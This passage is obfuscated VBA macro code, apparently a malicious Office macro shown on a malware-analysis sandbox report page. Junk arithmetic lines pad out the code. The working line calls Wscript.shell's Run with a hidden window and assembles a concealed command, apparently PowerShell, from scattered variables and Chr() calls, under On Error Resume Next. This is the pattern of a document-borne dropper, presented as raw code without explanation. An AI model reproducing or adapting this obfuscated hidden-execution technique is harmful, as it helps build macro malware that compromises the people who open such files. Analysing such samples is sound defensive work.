vdquu = 85364 - 28236 * 10193 + mnUuNA - fFbLlh / hUaaiz / (36341 * YHmth - (47628 / qWnMIW + 75380 / iPoVO))
USSNi = 16834 - 50025 * 38426 + jGHiO - ITSZw / FYZZY / (89563 * rLqdE - (10739 / pUjzQ + 13194 / EDFBr))
wrzviY = 74180 - 1825 * 13916 + kCMNG - qNDQDI / DCTSMO / (38845 * qpLPbk - (28184 / RiIac + 56410 / oTtHwd))
End Function
Attribute VB_Name = "sJSIAoio"
Function jmWPamh(mOicmhSvdb)
On Error Resume Next
pawmI = 75715 * QAwBu - 39827 + iIzVbT
jSwLd = 56861 * aGqivW - 18014 + uYhso
dXLwqk = 13266 * wsECoB - 87362 + szdBI
LrUCfI = 31736 * YMKka - 36244 + nrlzkZ
wvzoq = 40167 * haDaI - 21755 + nSiYfi
OjjwJ = 18625 * niIGpM - 6491 + qSDwiD
KpQuu = 17751 * ZbBjuo - 892 + jluhCp
wsfak = 4839 * WwRYR - 16827 + PsbzzI
wSYXWQWjk = wYCnjzWcP + CreateObject("Wscript.shell").Run(anYwzGAEGn + Chr(vbKeyP) + ZOnwiZRLij + Chr(vbKeyO) + mOicmhSvdb + TrPHud, 821497031 - 821497031)
UiOqz = 84383 * VahZMH - 88980 + DkowuV
OwIzp = 53762 * sYTaGl - 12062 + tvLbHw
nzfPHw = 84611 * HPYatn - 44928 + nEicF
qOWmr = 72771 * dwjSmb - 35885 + zTwzjd
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.